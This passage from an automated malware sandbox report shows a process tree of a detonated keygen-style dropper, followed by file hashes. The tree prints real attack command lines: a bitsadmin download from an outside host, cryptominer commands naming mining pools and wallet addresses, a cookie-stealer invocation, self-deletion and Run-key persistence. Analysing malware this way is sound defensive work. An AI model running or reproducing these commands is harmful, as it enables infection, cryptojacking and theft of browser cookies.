                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:5056
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:7080
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:6708
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                • Checks for any installed AV software in registry
                                                                                                                                                                                                                                PID:508
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                                                PID:4896
                                                                                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                PID:5124
                                                                                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:4840
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:4380
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:6428
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                      PID:5316
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:4356
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:652
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          PID:6784
                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:428
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:6604
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:4488
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:4368
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:4116
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:5368
                                                                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:2732
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qg4jtsng.jiw\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:5588
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe & exit
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:2208
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:5564
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                        PID:5448
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\531vjcul.w5g\c7ae36fa.exe & exit
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:5444
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\531vjcul.w5g\c7ae36fa.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\531vjcul.w5g\c7ae36fa.exe
                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                        PID:5920
                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe /8-2222 & exit
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:5160
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe /8-2222
                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:5788
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe" /8-2222
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                          PID:4192
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                              PID:4580
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\B14F.tmp.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\B14F.tmp.exe"
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                PID:960
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\B14F.tmp.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\B14F.tmp.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:5920
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\B558.tmp.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\B558.tmp.exe"
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:5160
                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w26753@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:2836
                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w9676 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                        PID:5632
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:5908
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                          PID:5404
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                      PID:6184
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                      PID:5056
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:3736
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:6948
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:5132
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:3176
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:4260
                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  PID:3836
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:5360
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  PID:5944
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  PID:4900
                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  PID:6964
                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                  PID:4288
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\AECA.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\AECA.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DB98.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DB98.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:428
                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:6888
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E983.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E983.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:5804
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 276
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        PID:6948
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F089.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F089.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:6800
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:7096
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:6348
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5920
                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                            PID:6168
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:2324
                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                              PID:1840
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5256
                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                PID:6268
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6236
                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5552
                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6984
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                      PID:6924
                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                      PID:5840
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                      PID:1016
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:6260
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        PID:6636

                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        f7e94a394e54ac76b6f9506af6b806c7

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        aa1de7f8fde18d2bd4301e6077f8d277a8840a7b

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        6f4f65d63c2f196e851893a86e4a0660a24be39c4530bf8ccfce0d35bc86b310

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        9e70e32c69d4b89ecfeed85c18ccda46257d40bafdc309eef61be413b7c6e24505369f16684d0a85414db98a6233330f21683fdfdf87cf935ffa8905cb695767

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                                                        SHA512

